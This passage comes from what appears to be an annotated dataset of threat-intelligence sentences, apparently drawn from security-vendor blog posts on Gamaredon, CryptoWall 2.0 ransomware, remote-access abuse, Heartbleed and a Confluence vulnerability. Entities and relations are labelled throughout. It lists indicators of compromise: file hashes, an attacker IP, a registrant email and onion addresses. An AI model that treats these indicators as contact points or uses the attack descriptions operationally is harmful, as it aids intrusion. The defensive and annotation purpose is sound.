(Jan. 20) Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)","entities":[{"id":965,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":966,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":51805,"label":"TIME","start_offset":58,"end_offset":65},{"id":51806,"label":"TIME","start_offset":151,"end_offset":158},{"id":45982,"label":"location","start_offset":23,"end_offset":29},{"id":45983,"label":"location","start_offset":34,"end_offset":41},{"id":45981,"label":"location","start_offset":67,"end_offset":74}],"relations":[{"id":139,"from_id":965,"to_id":966,"type":"duplicate-of"},{"id":141,"from_id":966,"to_id":45981,"type":"originates-from"},{"id":140,"from_id":965,"to_id":45981,"type":"originates-from"}],"Comments":[]} {"id":288,"text":"Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot Threat Briefing: Protecting Against Russia-Ukraine Cyber Activity Palo Alto Networks Resource Page: Protect Against Russia-Ukraine Cyber Activity Cortex XDR Protections Against Malware Associated with Ukraine and Russia Cyber Activity","entities":[{"id":970,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":974,"label":"malware","start_offset":94,"end_offset":102},{"id":976,"label":"malware","start_offset":122,"end_offset":130},{"id":977,"label":"location","start_offset":167,"end_offset":173},{"id":978,"label":"location","start_offset":174,"end_offset":181},{"id":979,"label":"identity","start_offset":197,"end_offset":215},{"id":981,"label":"location","start_offset":247,"end_offset":253},{"id":982,"label":"location","start_offset":254,"end_offset":261},{"id":983,"label":"tools","start_offset":277,"end_offset":287},{"id":44679,"label":"identity","start_offset":30,"end_offset":54},{"id":44678,"label":"location","start_offset":47,"end_offset":54},{"id":44685,"label":"location","start_offset":332,"end_offset":339},{"id":44686,"label":"location","start_offset":344,"end_offset":350}],"relations":[{"id":116,"from_id":970,"to_id":44679,"type":"targets"},{"id":118,"from_id":974,"to_id":970,"type":"uses"},{"id":119,"from_id":976,"to_id":970,"type":"uses"},{"id":117,"from_id":974,"to_id":44679,"type":"targets"}],"Comments":[]} {"id":289,"text":"CISA: Shields Up Technical Guidance 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf 06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 Name","entities":[{"id":988,"label":"SHA2","start_offset":37,"end_offset":101},{"id":989,"label":"SHA2","start_offset":102,"end_offset":166},{"id":990,"label":"SHA2","start_offset":167,"end_offset":231},{"id":992,"label":"SHA2","start_offset":297,"end_offset":361},{"id":991,"label":"SHA2","start_offset":232,"end_offset":296},{"id":993,"label":"SHA2","start_offset":362,"end_offset":426},{"id":45984,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":290,"text":"Hermetica Digital Ltd Thumbprint 1AE7556DFACD47D9EFBE79BE974661A5A6D6D923 Serial Number 0C 48 73 28 73 AC 8C CE BA F8 F0 E1 E8 32 9C EC","entities":[{"id":45985,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":291,"text":" gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id[.]onion","entities":[{"id":44687,"label":"DOMAIN","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":292,"text":" Please see the IoCs on GitHub.","entities":[{"id":45987,"label":"SOFTWARE","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} {"id":293,"text":"In Alert AA22-011A (updated March 1, 2022), the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (DHS\/CISA) identifies a selection of vulnerabilities that Russian advanced persistent threat (APT) groups are assessed to have exploited in the past, but recommends that users take action against a much broader list of known exploited vulnerabilities (KEVs).","entities":[{"id":45992,"label":"identity","start_offset":141,"end_offset":145},{"id":45989,"label":"identity","start_offset":48,"end_offset":84},{"id":45990,"label":"identity","start_offset":87,"end_offset":135},{"id":45991,"label":"identity","start_offset":137,"end_offset":140},{"id":45993,"label":"location","start_offset":194,"end_offset":201}],"relations":[],"Comments":[]} {"id":294,"text":"The cited KEVs and their impacted devices – all of which can be identified using Cortex Xpanse – are: Cortex Xpanse’s ability to index the entire internet helps organizations discover, prioritize, and remediate significant exposures on their attack surfaces – including all of the impacted services listed above.","entities":[{"id":44688,"label":"SOFTWARE","start_offset":81,"end_offset":94},{"id":44689,"label":"SOFTWARE","start_offset":104,"end_offset":117}],"relations":[],"Comments":[]} {"id":295,"text":"We routinely observe vulnerable devices across the global internet, despite the fact that most of these CVEs are more than two years old.","entities":[],"relations":[],"Comments":[]} {"id":296,"text":"Beyond Alert AA22-011A, CISA’s overarching guidance for attack surface reduction includes hardening of forward-facing network services, with prioritized patching of KEVs, as documented in Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities (KEV).","entities":[{"id":45994,"label":"identity","start_offset":24,"end_offset":28}],"relations":[],"Comments":[]} {"id":297,"text":"This directive requires agencies to remediate all vulnerabilities that CISA includes in their KEV catalog based on an assessment that the vulnerabilities “carry significant risk to the federal enterprise.”","entities":[{"id":45995,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":298,"text":"Learn more and see a detailed workflow example on the Palo Alto Networks SecOps blog, “How Xpanse Can Identify CISA-Identified Known Exploited Vulnerabilities.” ","entities":[{"id":45998,"label":"identity","start_offset":111,"end_offset":115},{"id":45996,"label":"identity","start_offset":54,"end_offset":72},{"id":45997,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} {"id":299,"text":"Updated April 1, 2022, at 11 a.m. PT.","entities":[{"id":45999,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} {"id":300,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":301,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":302,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":303,"text":"Recent events continue to highlight the abuse of remote access applications in the enterprise.","entities":[],"relations":[],"Comments":[]} {"id":304,"text":"Last Tuesday, Trusteer reported that a new variant of Citadel, which has long relied on VNC to give attackers remote control over systems, began adding new credentials to systems it infects and enabling the standard Windows remote desktop application (RDP).","entities":[{"id":1035,"label":"malware","start_offset":54,"end_offset":61},{"id":46000,"label":"tools","start_offset":88,"end_offset":91},{"id":46001,"label":"tools","start_offset":216,"end_offset":256},{"id":46002,"label":"identity","start_offset":14,"end_offset":22},{"id":46003,"label":"TIME","start_offset":0,"end_offset":12}],"relations":[{"id":142,"from_id":1035,"to_id":46000,"type":"uses"},{"id":143,"from_id":1035,"to_id":46001,"type":"uses"}],"Comments":[]} {"id":305,"text":"This allows the attacker to maintain control over the system even after the Citadel infection is removed.","entities":[{"id":46004,"label":"malware","start_offset":76,"end_offset":83}],"relations":[],"Comments":[]} {"id":306,"text":"As the report indicates, using RDP this way also allows the attackers to “fly under the radar” as RDP is commonly used by administrators and often not treated as a threat.","entities":[{"id":44690,"label":"tools","start_offset":98,"end_offset":101},{"id":44691,"label":"tools","start_offset":31,"end_offset":34}],"relations":[],"Comments":[]} {"id":307,"text":" Later that same week, US-CERT released alert TA14-212A on the Backoff Point of Sale (PoS) malware, which describes how malicious actors used publicly available tools to identify organizations that use remote access applications in an unsafe way.","entities":[{"id":46005,"label":"identity","start_offset":23,"end_offset":30},{"id":46006,"label":"malware","start_offset":63,"end_offset":90}],"relations":[],"Comments":[]} {"id":308,"text":"This reconnaissance was then leveraged in brute force attacks against credentials, toward unauthorized access, implant installation, and subsequent exfiltration of consumer payment data.","entities":[{"id":1059,"label":"attack-pattern","start_offset":42,"end_offset":53},{"id":46007,"label":"attack-pattern","start_offset":111,"end_offset":131},{"id":46009,"label":"attack-pattern","start_offset":148,"end_offset":185},{"id":46008,"label":"attack-pattern","start_offset":90,"end_offset":109}],"relations":[],"Comments":[]} {"id":309,"text":"As with any tool, remote access applications can be used for good or malicious intent.","entities":[],"relations":[],"Comments":[]} {"id":310,"text":"It would be inefficient for an administrator to travel to a physical office to make a change on a system, but its critical that organizations take control over these applications.","entities":[],"relations":[],"Comments":[]} {"id":311,"text":"The first step is identifying them in your network.","entities":[],"relations":[],"Comments":[]} {"id":312,"text":"Palo Alto Networks currently tracks 90 different remote-access applications in Applipedia.","entities":[{"id":45786,"label":"SOFTWARE","start_offset":79,"end_offset":89},{"id":44692,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":313,"text":" Examples include Remote Desktop Protocol (RDP), Virtual Network Connection (VNC), TeamViewer, and even Secure Shell (SSH), to name a few.","entities":[{"id":1072,"label":"attack-pattern","start_offset":18,"end_offset":41},{"id":1075,"label":"tools","start_offset":83,"end_offset":93},{"id":1073,"label":"tools","start_offset":43,"end_offset":46},{"id":46010,"label":"tools","start_offset":104,"end_offset":122},{"id":46011,"label":"tools","start_offset":49,"end_offset":81}],"relations":[],"Comments":[]} {"id":314,"text":" Once you can identify the traffic, you need to separate the good from the bad.","entities":[],"relations":[],"Comments":[]} {"id":315,"text":"If your company runs Windows and relies on RDP, you can close off VNC, TeamViewer and the other 87 applications because you don’t need them.","entities":[{"id":44693,"label":"SOFTWARE","start_offset":21,"end_offset":28},{"id":44694,"label":"tools","start_offset":43,"end_offset":46},{"id":44695,"label":"tools","start_offset":66,"end_offset":69},{"id":44696,"label":"tools","start_offset":71,"end_offset":81}],"relations":[],"Comments":[]} {"id":316,"text":"If your administrators and help desk are the only ones who need RDP access to your systems, disable RDP for the rest of your users.","entities":[{"id":46013,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":46012,"label":"SOFTWARE","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} {"id":317,"text":"The key is putting a policy in place and making sure your technology is enforcing that policy at the network layer.","entities":[],"relations":[],"Comments":[]} {"id":318,"text":" The Backoff and Citadel reports from last week highlight how uncontrolled remote access broadens your attack surface and acts as a backdoor for attackers already in your network.","entities":[{"id":1095,"label":"malware","start_offset":5,"end_offset":12},{"id":1097,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":319,"text":"Remote-access abuse is not a new problem.","entities":[{"id":46014,"label":"attack-pattern","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":320,"text":"We’ve been highlighting the importance of controlling this threat since 2009, but five years later it remains an issue for many organizations.","entities":[{"id":46015,"label":"TIME","start_offset":66,"end_offset":76}],"relations":[],"Comments":[]} {"id":321,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":322,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":323,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":324,"text":"The latest development in the ransomware world is CryptoWall 2.0, a new version of this malware family that uses the Tor network for command and control.","entities":[{"id":44699,"label":"malware","start_offset":50,"end_offset":64},{"id":44700,"label":"tools","start_offset":117,"end_offset":120}],"relations":[{"id":14,"from_id":44699,"to_id":44700,"type":"uses"}],"Comments":[]} {"id":325,"text":" F-Secure was the first to spot this new version on October 1, but since then the attacks have ramped up and new variants of the malware are emerging daily.","entities":[{"id":46017,"label":"TIME","start_offset":52,"end_offset":61},{"id":46016,"label":"identity","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} {"id":326,"text":"Our WildFire analysis platform has picked up 84 CryptoWall 2.0 variants since September 30, delivered primarily through e-mail attachments but also through malicious PDFs and web exploit kits.","entities":[{"id":1120,"label":"tools","start_offset":4,"end_offset":12},{"id":46018,"label":"malware","start_offset":48,"end_offset":62},{"id":46019,"label":"TIME","start_offset":78,"end_offset":90}],"relations":[],"Comments":[]} {"id":327,"text":" CryptoWall 2.0 is similar to other ransomware attacks that have plagued users and businesses for nearly a decade.","entities":[{"id":44701,"label":"malware","start_offset":1,"end_offset":15}],"relations":[],"Comments":[]} {"id":328,"text":"Once it is running on a system, CryptoWall 2.0 seeks out document files and encrypts them using the RSA encryption algorithm.","entities":[{"id":46020,"label":"malware","start_offset":32,"end_offset":46}],"relations":[],"Comments":[]} {"id":329,"text":"The attacker holds the key necessary to decrypt the files unless the victim agrees to pay a $500 ransom. Unlike previous versions of CryptoWall, 2.0 communicates with its command and control (C2) server through the Tor anonymization network.","entities":[{"id":46021,"label":"malware","start_offset":134,"end_offset":149},{"id":46022,"label":"tools","start_offset":216,"end_offset":219},{"id":46023,"label":"Infrastucture","start_offset":172,"end_offset":203}],"relations":[{"id":145,"from_id":46021,"to_id":46022,"type":"uses"},{"id":144,"from_id":46021,"to_id":46023,"type":"beacons-to"}],"Comments":[]} {"id":330,"text":"This allows attackers to hide their communications and avoid having their C2 servers shut down, but also makes it easy for organizations to block the threat.","entities":[],"relations":[],"Comments":[]} {"id":331,"text":"CryptoWall isn’t the only threat that communicates over Tor and if your network doesn’t have an explicit reason to allow anonymization networks, you should consider blocking the application altogether with your firewall.","entities":[{"id":1138,"label":"malware","start_offset":0,"end_offset":10},{"id":1140,"label":"tools","start_offset":56,"end_offset":59}],"relations":[{"id":147,"from_id":1138,"to_id":1140,"type":"uses"}],"Comments":[]} {"id":332,"text":" If your system has already been infected with CryptoWall 2.0, you’ll see a pop-up just like this one shortly after the malware has encrypted your documents.","entities":[{"id":46024,"label":"malware","start_offset":47,"end_offset":61}],"relations":[],"Comments":[]} {"id":333,"text":"Note that the attacker has given you a few options for how to pay them the ransom.","entities":[],"relations":[],"Comments":[]} {"id":334,"text":"The green box contains four links that will work only for your system.","entities":[],"relations":[],"Comments":[]} {"id":335,"text":"These use four domains registered just today:","entities":[],"relations":[],"Comments":[]} {"id":336,"text":" All of the domains currently resolve to 151.248.115.146, a Russian IP address and have WhoIs records associated with the e-mail address “ladomfichisi1987@mail.ru”.","entities":[{"id":1156,"label":"IPV4","start_offset":41,"end_offset":56},{"id":46025,"label":"location","start_offset":60,"end_offset":67},{"id":44703,"label":"EMAIL","start_offset":138,"end_offset":162}],"relations":[{"id":148,"from_id":1156,"to_id":44703,"type":"related-to"}],"Comments":[]} {"id":337,"text":"This is the same address used to register two other payment domains registered earlier this month:","entities":[],"relations":[],"Comments":[]} {"id":338,"text":"If these domains are confiscated or otherwise shut down, CryptoWall instructs the user to download the Tor Browser and access a website (paytordmbdekmizq.onion) that is only accessible over the Tor network. Unlikely some of it’s more flexible competition, CryptoWall only accepts ransom in the form of BitCoin.","entities":[{"id":46026,"label":"malware","start_offset":57,"end_offset":67},{"id":46027,"label":"tools","start_offset":103,"end_offset":114},{"id":46028,"label":"DOMAIN","start_offset":137,"end_offset":159},{"id":46029,"label":"SOFTWARE","start_offset":194,"end_offset":205},{"id":46031,"label":"SOFTWARE","start_offset":303,"end_offset":310},{"id":46030,"label":"malware","start_offset":257,"end_offset":267}],"relations":[{"id":149,"from_id":46026,"to_id":46027,"type":"related-to"},{"id":150,"from_id":46026,"to_id":46028,"type":"related-to"}],"Comments":[]} {"id":339,"text":"To pay the ransom the user will need to acquire 1.33 BitCoins and transfer them to a specific BitCoin wallet that is associated with their specific infection.","entities":[{"id":44704,"label":"SOFTWARE","start_offset":53,"end_offset":61},{"id":44705,"label":"SOFTWARE","start_offset":94,"end_offset":101}],"relations":[],"Comments":[]} {"id":340,"text":" History has shown that paying the ransom will likely allow you to retrieve your files, but the best defense against ransomware is having up-to-date back-ups or by preventing the infection all-together.","entities":[],"relations":[],"Comments":[]} {"id":341,"text":" Since we detected the first CryptoWall 2.0 variant with our WildFire engine on September 29, we’ve seen over 85,000 separate attacks attempting to deliver the malware.","entities":[{"id":1185,"label":"malware","start_offset":61,"end_offset":69},{"id":46032,"label":"TIME","start_offset":80,"end_offset":92},{"id":46033,"label":"malware","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} {"id":342,"text":"The majority of these have come through e-mails with executable attachments, sometimes contained in .zip files.","entities":[],"relations":[],"Comments":[]} {"id":343,"text":"Most of the e-mail attacks used fake invoice, fax and voicemail themes with attachments named like the following:","entities":[],"relations":[],"Comments":[]} {"id":344,"text":" In the last week we’ve seen the attack vectors evolve to contain exploit kits as well.","entities":[],"relations":[],"Comments":[]} {"id":345,"text":"On October 19, the Kafeine posted a blog discussing the inclusion of CVE-2014-0556 in the Nuclear Pack exploit kit, which was installing CryptoWall 2.0.","entities":[{"id":44706,"label":"TIME","start_offset":3,"end_offset":13},{"id":44707,"label":"malware","start_offset":137,"end_offset":151},{"id":44708,"label":"vulnerability","start_offset":69,"end_offset":82},{"id":44709,"label":"malware","start_offset":90,"end_offset":114},{"id":44710,"label":"threat-actor","start_offset":19,"end_offset":26}],"relations":[{"id":15,"from_id":44707,"to_id":44708,"type":"exploits"},{"id":16,"from_id":44709,"to_id":44707,"type":"delivers"},{"id":17,"from_id":44710,"to_id":44709,"type":"authored-by"}],"Comments":[]} {"id":346,"text":" Yesterday we picked up an e-mail campaign pretending to be a fax report that carried a .zip attachment with a PDF inside.","entities":[{"id":46034,"label":"campaign","start_offset":27,"end_offset":42}],"relations":[],"Comments":[]} {"id":347,"text":"The PDF exploits CVE-2013-2729 to download a binary which also installed CryptoWall 2.0.","entities":[{"id":46035,"label":"malware","start_offset":74,"end_offset":88},{"id":46036,"label":"vulnerability","start_offset":18,"end_offset":31}],"relations":[{"id":151,"from_id":46035,"to_id":46036,"type":"exploits"}],"Comments":[]} {"id":348,"text":" The best way to protect yourself against ransomware is to keep up-to-date backups of your important files.","entities":[],"relations":[],"Comments":[]} {"id":349,"text":"A ransomware infection, which encrypts all of your files, is similar to a drive failure, except that for a small fee you have the chance to get your files back.","entities":[],"relations":[],"Comments":[]} {"id":350,"text":" To protect against CryptoWall 2.0 we recommend taking the following actions: Adobe Reader Embedded BMP Parsing Integer Overflow Vulnerability CVE-2014-0556 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46038,"label":"SOFTWARE","start_offset":79,"end_offset":91},{"id":46039,"label":"vulnerability","start_offset":145,"end_offset":158},{"id":46037,"label":"malware","start_offset":20,"end_offset":34},{"id":46041,"label":"vulnerability","start_offset":92,"end_offset":143}],"relations":[{"id":152,"from_id":46037,"to_id":46039,"type":"exploits"}],"Comments":[]} {"id":351,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":352,"text":"Yesterday, TrustedSec, a security consultancy based on Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160).","entities":[{"id":46042,"label":"TIME","start_offset":0,"end_offset":9},{"id":46043,"label":"identity","start_offset":11,"end_offset":21},{"id":46044,"label":"location","start_offset":55,"end_offset":59},{"id":46045,"label":"identity","start_offset":93,"end_offset":123},{"id":46047,"label":"vulnerability","start_offset":196,"end_offset":209},{"id":46046,"label":"vulnerability","start_offset":162,"end_offset":194}],"relations":[],"Comments":[]} {"id":353,"text":"CHS’s 8-K filing on Monday did not reveal how the attackers got into their network, only that the records of approximately 4.5 million patients were stolen in attacks in between April and June of 2014.","entities":[{"id":46048,"label":"identity","start_offset":0,"end_offset":3},{"id":46049,"label":"TIME","start_offset":20,"end_offset":26},{"id":46050,"label":"TIME","start_offset":178,"end_offset":184},{"id":46051,"label":"TIME","start_offset":188,"end_offset":200}],"relations":[],"Comments":[]} {"id":354,"text":"TrustedSec reports on how attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN.","entities":[{"id":44711,"label":"identity","start_offset":0,"end_offset":10},{"id":44712,"label":"vulnerability","start_offset":113,"end_offset":137},{"id":44713,"label":"tools","start_offset":167,"end_offset":170},{"id":44714,"label":"attack-pattern","start_offset":60,"end_offset":82}],"relations":[{"id":18,"from_id":44714,"to_id":44712,"type":"exploits"}],"Comments":[]} {"id":355,"text":" We need more facts to be sure, but this instance may be the first public breach related to the Heartbleed vulnerability since it was announced in April.","entities":[{"id":46052,"label":"TIME","start_offset":147,"end_offset":152},{"id":46053,"label":"vulnerability","start_offset":96,"end_offset":120}],"relations":[],"Comments":[]} {"id":356,"text":"Now, over four months since the Heartbleed disclosure, this attack reminds us of how serious this vulnerability is and how critical protection against it remains.","entities":[{"id":46054,"label":"vulnerability","start_offset":32,"end_offset":42}],"relations":[],"Comments":[]} {"id":357,"text":" As Heartbleed allows the attacker to scrape memory from the vulnerable device, they can retrieve significant amounts of secret information.","entities":[{"id":44716,"label":"attack-pattern","start_offset":38,"end_offset":51},{"id":44715,"label":"vulnerability","start_offset":4,"end_offset":14}],"relations":[{"id":153,"from_id":44715,"to_id":44716,"type":"targets"}],"Comments":[]} {"id":358,"text":"In this case, that apparently included VPN credentials, which they then used to log into the network and more laterally from system to system until discovering the data they were after.","entities":[{"id":46055,"label":"SOFTWARE","start_offset":39,"end_offset":42}],"relations":[],"Comments":[]} {"id":359,"text":" While most vendors released patches for their products months ago it remains up to the users and administrators to ensure those patches are deployed.","entities":[],"relations":[],"Comments":[]} {"id":360,"text":"As the OpenSSL library is so widely used, some administrators may be finding unpatched systems for years to come.","entities":[{"id":44717,"label":"SOFTWARE","start_offset":7,"end_offset":22}],"relations":[],"Comments":[]} {"id":361,"text":"While network-based defenses are not a substitute for patching software, Heartbleed is detectable using IPS signatures.","entities":[{"id":46056,"label":"vulnerability","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} {"id":362,"text":"Palo Alto Networks deployed five signatures in April to defend against this threat, 40039, 36420, 36419, 36418 and 36416.","entities":[{"id":46057,"label":"identity","start_offset":0,"end_offset":18},{"id":46058,"label":"TIME","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} {"id":363,"text":" No matter how well patched your systems are, there’s no reason not to deploy IPS signatures like these to detect and block attempted Heartbleed exploits.","entities":[{"id":44718,"label":"vulnerability","start_offset":134,"end_offset":144}],"relations":[],"Comments":[]} {"id":364,"text":"If you’ve already deployed signatures and your logs are showing attempted exploits, consider blocking or monitoring the IP addresses sending the requests.","entities":[],"relations":[],"Comments":[]} {"id":365,"text":"A Heartbleed probe could be evidence of the early stages of an attack on your network, and persistent attackers are unlikely to give up after jiggling the handle on the front door.","entities":[{"id":46059,"label":"vulnerability","start_offset":2,"end_offset":12}],"relations":[],"Comments":[]} {"id":366,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":367,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":368,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":369,"text":"This post is also available in: 日本語 (Japanese) On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application.","entities":[{"id":44719,"label":"TIME","start_offset":56,"end_offset":63},{"id":44720,"label":"identity","start_offset":64,"end_offset":72},{"id":44721,"label":"SOFTWARE","start_offset":189,"end_offset":211}],"relations":[],"Comments":[]} {"id":370,"text":"After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center.","entities":[{"id":46061,"label":"vulnerability","start_offset":95,"end_offset":130},{"id":46063,"label":"SOFTWARE","start_offset":134,"end_offset":167},{"id":46062,"label":"identity","start_offset":34,"end_offset":42}],"relations":[{"id":154,"from_id":46063,"to_id":46061,"type":"has"}],"Comments":[]} {"id":371,"text":"The details were reported to Atlassian on May 31, and Atlassian has since assigned the issue to CVE-2022-26134.","entities":[{"id":46064,"label":"TIME","start_offset":42,"end_offset":48},{"id":46065,"label":"identity","start_offset":29,"end_offset":38},{"id":46066,"label":"identity","start_offset":54,"end_offset":63},{"id":46067,"label":"vulnerability","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} {"id":372,"text":" Based on the security advisory issued by Atlassian, it appears that the exploit is indeed an unauthenticated, remote code execution vulnerability.","entities":[{"id":44723,"label":"identity","start_offset":42,"end_offset":51},{"id":44724,"label":"attack-pattern","start_offset":111,"end_offset":132}],"relations":[],"Comments":[]} {"id":373,"text":"If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":46068,"label":"attack-pattern","start_offset":55,"end_offset":76},{"id":46069,"label":"attack-pattern","start_offset":81,"end_offset":99}],"relations":[],"Comments":[]} {"id":374,"text":"At the time of publication, the Palo Alto Networks attack surface management solution Cortex Xpanse identified 19,707 instances of Confluence Servers that are potentially affected by this CVE.","entities":[{"id":46070,"label":"identity","start_offset":32,"end_offset":50},{"id":46072,"label":"SOFTWARE","start_offset":131,"end_offset":149},{"id":46071,"label":"SOFTWARE","start_offset":86,"end_offset":99}],"relations":[],"Comments":[]} {"id":375,"text":" A patch resolving the issue has been posted by Atlassian.","entities":[{"id":44725,"label":"SOFTWARE","start_offset":48,"end_offset":57}],"relations":[],"Comments":[]} {"id":376,"text":"Palo Alto Networks strongly advises organizations to patch immediately.","entities":[{"id":46073,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":377,"text":" Updated June 7 to add additional in-the-wild observations.","entities":[{"id":46074,"label":"TIME","start_offset":9,"end_offset":15}],"relations":[],"Comments":[]} {"id":378,"text":"Vulnerable Systems CVE-2022-26134 in the Wild Cortex Managed Threat Hunting Detections of CVE-2022-26134","entities":[{"id":44726,"label":"vulnerability","start_offset":19,"end_offset":33},{"id":44727,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44728,"label":"vulnerability","start_offset":90,"end_offset":104}],"relations":[],"Comments":[]} {"id":379,"text":"Conclusion Indicators of Compromise ","entities":[],"relations":[],"Comments":[]} {"id":380,"text":"The Palo Alto Networks attack surface management solution Cortex Xpanse found 19,707 instances of Confluence Servers that are potentially affected by this CVE.","entities":[{"id":46075,"label":"identity","start_offset":4,"end_offset":22},{"id":46077,"label":"SOFTWARE","start_offset":98,"end_offset":116},{"id":46076,"label":"SOFTWARE","start_offset":58,"end_offset":71}],"relations":[],"Comments":[]} {"id":382,"text":" Additionally, the Xpanse research team also found 1,251 end-of-life versions of the Confluence Server exposed on the public internet.","entities":[{"id":46080,"label":"SOFTWARE","start_offset":85,"end_offset":102},{"id":46079,"label":"identity","start_offset":19,"end_offset":39}],"relations":[],"Comments":[]} {"id":383,"text":"Assets running end-of-life software should never be internet-facing.","entities":[],"relations":[],"Comments":[]} {"id":384,"text":"If an asset cannot be updated to secure versions of software, it should be isolated or decommissioned altogether.","entities":[],"relations":[],"Comments":[]} {"id":385,"text":"To learn more about the ubiquitous problem of end-of-life software, please refer to the 2022 Cortex Xpanse Attack Surface Threat Report.","entities":[{"id":46081,"label":"TIME","start_offset":88,"end_offset":92},{"id":46082,"label":"SOFTWARE","start_offset":93,"end_offset":106}],"relations":[],"Comments":[]} {"id":386,"text":" Thus far, Unit 42 has noted historical scans being performed by the IP addresses publicly shared by Volexity.","entities":[{"id":46084,"label":"identity","start_offset":101,"end_offset":109},{"id":46083,"label":"identity","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":387,"text":"These scans date back as early as May 26, 2022, and target organizations in various industries.","entities":[{"id":44733,"label":"TIME","start_offset":34,"end_offset":46}],"relations":[],"Comments":[]} {"id":388,"text":" Additionally, a purported proof of concept (PoC) has reached the public domain, increasing the threat this particular vulnerability poses.","entities":[],"relations":[],"Comments":[]} {"id":389,"text":" The Cortex Managed Threat Hunting team has detected several exploitation attempts.","entities":[{"id":46085,"label":"identity","start_offset":5,"end_offset":39}],"relations":[],"Comments":[]} {"id":390,"text":"Among the attempts, we found successful exploitation, which resulted in the Cerber Ransomware attack.","entities":[{"id":44734,"label":"campaign","start_offset":76,"end_offset":100}],"relations":[],"Comments":[]} {"id":391,"text":" The ransomware was blocked by the Cortex XDR agent.","entities":[{"id":46086,"label":"SOFTWARE","start_offset":36,"end_offset":52}],"relations":[],"Comments":[]} {"id":392,"text":"The Managed Threat Hunting team immediately reported this incident to the customer and continues to monitor our customers using the XQL queries in the following section.","entities":[{"id":46088,"label":"SOFTWARE","start_offset":132,"end_offset":135},{"id":46087,"label":"identity","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} {"id":393,"text":"Cortex XDR also includes multiple detections for post-exploitation activities.","entities":[{"id":44735,"label":"SOFTWARE","start_offset":0,"end_offset":10},{"id":44736,"label":"attack-pattern","start_offset":49,"end_offset":77}],"relations":[],"Comments":[]} {"id":394,"text":" Below are details of what was seen in the attempt.","entities":[],"relations":[],"Comments":[]} {"id":395,"text":" In this case, the process tomcat.exe spawned multiple reconnaissance commands such as: whoami, systeminfo, arp, ipconfig, etc. On top of that, a Base64-encoded PowerShell command was executed and retrieved a ransomware binary.","entities":[{"id":46091,"label":"tools","start_offset":97,"end_offset":107},{"id":46092,"label":"tools","start_offset":109,"end_offset":113},{"id":46094,"label":"attack-pattern","start_offset":148,"end_offset":181},{"id":46089,"label":"FILEPATH","start_offset":28,"end_offset":38},{"id":46090,"label":"tools","start_offset":89,"end_offset":95},{"id":46093,"label":"tools","start_offset":114,"end_offset":122}],"relations":[],"Comments":[]} {"id":396,"text":" In order to confirm the assumption that the above activity is related to CVE-2022-26134, we looked into the Confluence Apache access logs (atlassian-confluence.log) and found the PowerShell execution. The Cortex Managed Threat Hunting team continues to 